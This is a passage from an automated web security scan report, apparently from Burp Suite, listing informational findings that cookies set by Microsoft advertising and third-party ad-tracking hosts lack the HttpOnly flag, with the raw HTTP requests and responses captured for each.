bh="b!!!#@!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pv!!!!#<wsXA!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.~~!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%~~!#]Zk!!!!#<x(sV!#^Bo~~!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsXA!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h~~!#l)E!!!!#<wsXA!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$'/1!!!!#<wx=%!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs~~"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:41:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#<!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pv!!!!#<wsXA!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]Zk!!!!#<x(sV!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsXA!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#l)E!!!!#<wsXA!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cU!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$'/1!!!!#<wx=%!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT"; path=/; expires=Thu, 25-Apr-2013 18:41:09 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=p3C0CPWTgAMQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Tue, 26 Apr 2011 18:41:09 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


14.48. http://advertising.microsoft.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home?s_cid=us_msn_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.myhomemsn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; 18987408-VID=16601209214853; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_NVR_RU=0=technet|msdn:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649894761:ss=1303649859266

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 18:44:44 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_msn_footer; path=/
Set-Cookie: MarketToggleClosedTest=; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Set-Cookie: MarketToggleRenderMethod=STATICADVERTISING.MICROSOFT.COM; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:44:44 GMT
Content-Length: 70966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...

14.49. http://altfarm.mediaplex.com/ad/js/15902-126860-34879-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/15902-126860-34879-0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/15902-126860-34879-0?mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Fri, 26-Apr-2013 5:03:12 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D4926950&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f
Content-Length: 0
Date: Tue, 26 Apr 2011 21:50:04 GMT


14.50. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d840009/7/41115363/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d840009/7/41115363/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:49:17 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Mon, 26 Apr 2010 21:49:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1; expires=Sat, 16 Jun 2012 13:49:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0; expires=Sat, 16-Jun-2012 13:49:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Content-Length: 1042
Content-Type: text/html

/* b203.dl - Tue Apr 26 12:42:39 EDT 2011 */
(function(){
var d=document,s_id="SafeCount_Link",b;
function z(){
var ifr=(self!=top),sd="",b;

try{
b = top.document.body;
ifr = false;
} catch (e) { }


...[SNIP]...

14.51. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adscgen/st.php?survey_num=851211&site=60069804&code=39864914&randnum=6031698 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00047/47000000000040614.1?!&&PID=8370651&UIT=G&TargetID=8192380&AN=2047363577&PG=CP49XU&ASID=592c970828da41888e4fe12bfdeb5382&destination=;ord=2047363577?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:41:37 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Mon, 26 Apr 2010 18:41:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; expires=Sat, 16 Jun 2012 10:41:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-n|0'M-0; expires=Sat, 16-Jun-2012 10:41:37 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=851211&site=60069804-60069804-&code=39864914
Content-Length: 0
Content-Type: text/html


14.52. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303842976.104,wait-%3E10000,&1303842986960 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_G=method->-1,ts->1303842973; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:24 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

14.53. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p91136705&PRAd=296638381&AR_C=211671727 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638381/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:40:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:08 2011&recExp=Tue Apr 26 18:40:08 2011&prad=296638381&arc=211671727&; expires=Mon 25-Jul-2011 18:40:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26440

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638381",Pid:"p91136705",Arc:"211671727",Location:
...[SNIP]...

14.54. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842973; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30464

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...

14.55. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=194941084 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0078565546631069&output=html&h=90&slotname=0597910248&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&dt=1303854583029&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303854583063&frm=1&adk=362780761&ga_vid=81945644.1303854583&ga_sid=1303854583&ga_hid=1074700742&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3993542599&fu=0&ifi=1&dtd=40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:08 2011&recExp=Tue Apr 26 18:40:08 2011&prad=296638381&arc=211671727&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 21:52:01 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=25&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 21:52:01 2011&prad=256163696&arc=194941084&; expires=Mon 25-Jul-2011 21:52:01 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303854721; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25333

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"194941084",Location:
...[SNIP]...

14.56. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=1303842937293&c7=http%3A%2F%2Fwww.msn.com%2F&c1=2&c2=3000001 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
